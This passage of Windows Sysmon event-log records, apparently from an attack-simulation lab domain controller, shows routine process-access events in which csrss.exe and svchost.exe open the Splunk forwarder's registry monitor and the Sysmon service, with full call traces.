Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0462-5F25-0000-001011660C00}","TargetProcessId":"3792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6556,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:54.604\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0462-5F25-0000-001011660C00}\r\nTargetProcessId: 3792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:54.604","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0462-5F25-0000-001011660C00}","TargetProcessId":"3792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6557,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:54.604\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:54.604","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6558,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:54.604\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:54.604","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6559,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:54.604\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:54.604","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6560,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:54.604\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:54.604","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6561,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:54.604\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:54.604","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6562,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:54.604\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:54.604","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6563,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:54.604\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:54.604","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
